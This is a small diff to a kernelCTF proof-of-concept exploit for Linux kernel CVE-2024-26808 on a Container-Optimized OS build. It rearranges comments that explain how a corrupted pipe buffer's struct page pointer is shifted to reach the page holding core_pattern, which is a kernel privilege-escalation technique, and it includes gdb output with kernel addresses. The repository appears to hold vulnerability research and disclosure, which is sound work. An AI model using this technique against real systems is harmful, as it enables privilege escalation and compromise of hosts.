diff --git a/pocs/linux/kernelctf/CVE-2024-26808_cos/exploit/cos-105-17412.294.36/exploit.c b/pocs/linux/kernelctf/CVE-2024-26808_cos/exploit/cos-105-17412.294.36/exploit.c
index bc9bf00f..0a1f6df9 100644
--- a/pocs/linux/kernelctf/CVE-2024-26808_cos/exploit/cos-105-17412.294.36/exploit.c
+++ b/pocs/linux/kernelctf/CVE-2024-26808_cos/exploit/cos-105-17412.294.36/exploit.c
@@ -705,15 +705,18 @@ int main(int argc, char **argv)
 			msgrcv(msqid[i + 0x2000], &msg,
 				   0x1000 - 0x30 + 0xc0 - 0x8, 6, 0);
 			// modify struct page that will represent of `core_pattern`'s page
+			// p->page was originally pointing vdso_image_64.data.
+			// the difference between the address of the pages of vdso_image_64.data and core_pattern is 0x863000
+			// every 4096 byte page, there is a 64 byte struct page* stored in vmemmap, 
+			// so to calculate the difference between struct page* addresses, you have to do: 0x863000 / 4096 * 64 which equals to 0x863000 >> 6
+			
 			// gef➤  p vdso_image_64.data
 			// $5 = (void *) 0xffffffff82d3b000 <raw_data>
 			// gef➤  p &core_pattern
 			// $6 = (char (*)[128]) 0xffffffff8359e7a0 <core_pattern>
 			// gef➤  p 0xffffffff8359e000-0xffffffff82d3b000
 			// $7 = 0x863000
-			// the difference between the address of the pages of vdso_image_64.data and core_pattern is 0x863000
-			// every 4096 byte page, there is a 64 byte struct page* stored in vmemmap, 
-			// so to calculate the difference between struct page* addresses, you have to do: 0x863000 / 4096 * 64 which equals to 0x863000 >> 6
+
 			p->page += (0x863000 >> 6);
 			// core_pattern is 0xffffffff8359e7a0, so 0x7a0 is the offset within core_pattern's page.
 			// Since p->len == 1, we need to subtract one on p->offset